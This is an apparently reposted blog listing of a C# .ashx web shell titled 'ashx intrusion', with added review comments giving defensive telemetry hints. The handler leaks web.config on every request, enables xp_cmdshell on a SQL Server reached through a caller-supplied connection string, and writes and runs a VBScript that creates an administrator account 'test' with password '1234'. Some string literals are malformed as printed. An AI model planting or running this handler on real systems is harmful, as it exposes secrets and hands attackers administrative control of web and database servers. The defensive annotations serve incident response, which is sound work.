  • ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    // TextLd is the generic-handler (.ashx) class for this listing, which the page publishes
    // under the title "ashx intrusion". As written, every request receives the site's
    // web.config, and the "method" query parameter selects further actions: writing a
    // VBScript file into the application root, enabling xp_cmdshell on a SQL Server reached
    // through a caller-supplied connection string, and running that script through
    // xp_cmdshell. No authentication or authorization check appears anywhere in the class.
    // NOTE(review): for defenders, an unexpected .ashx under site content that combines
    // web.config reads, SqlClient calls and script-file writes should be handled as a web
    // shell: preserve the file and the IIS logs, then review how it was written to the site.
    public class TextLd : IHttpHandler
    {
    // Starts d:1.vbs as a process, then writes script text to that same path.
    // The newPath parameter is never read, and nothing in this class calls this method.
    // The script text refers to the local Administrators group and to a user named "test".
    // NOTE(review): the literal below is reproduced exactly as the page shows it; its inner
    // double quotes are unescaped, so it is not a well-formed C# string as printed.
    // NOTE(review): relevant telemetry is local account creation and Administrators group
    // changes (Windows Security events 4720 and 4732).
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    // Writes the full text of the application's web.config to the HTTP response.
    // NOTE(review): web.config commonly holds connection strings and keys, so if this
    // handler was reachable, treat every secret in that file as disclosed and rotate it.
    // Protected configuration (encrypted sections) limits what a plain file read yields.
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    // Writes the same script text as CreateLocalUser to 1.vbs in the application root.
    // NOTE(review): this only succeeds when the worker-process identity has write access
    // to site content; denying that access and alerting on new script files under the web
    // root are the controls this step runs into.
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    // Opens a SqlConnection with the given connection string and runs the given text as a
    // non-query command; no result is read back. Both arguments are used verbatim.
    // The explicit Close() is redundant with the enclosing using block.
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    // Request entry point. Sets a text/plain content type, writes web.config to the
    // response unconditionally, then dispatches on the "method" query parameter.
    // Any exception message is echoed to the caller, and the response is ended.
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    // Runs before the dispatch, so web.config is disclosed on every request.
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    // The connection string comes straight from the query string.
    // NOTE(review): if IIS logs the query string, it will appear in cs-uri-query; check
    // there during incident response to see which database credentials were used.
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    case "1": WriteVbs(context); break;
    case "2":
    // NOTE(review): sp_configure changes need server-level rights, so this path depends
    // on the supplied login being over-privileged. An application login that is not
    // sysadmin, plus auditing of xp_cmdshell configuration changes, contains it.
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");// enable xp_cmdshell on the database server
    break;
    // Asks SQL Server to run cscript on the 1.vbs path resolved under the application root.
    // NOTE(review): the script host then runs as a child of the SQL Server service, so
    // cscript or cmd spawned by sqlservr.exe is the process-lineage signal to alert on.
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    default:
    // With no recognised method, web.config is written to the response a second time.
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    // Exception text (for example SQL errors) goes back to the caller.
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    // IHttpHandler member; false means the handler instance is not reused across requests.
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }

  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html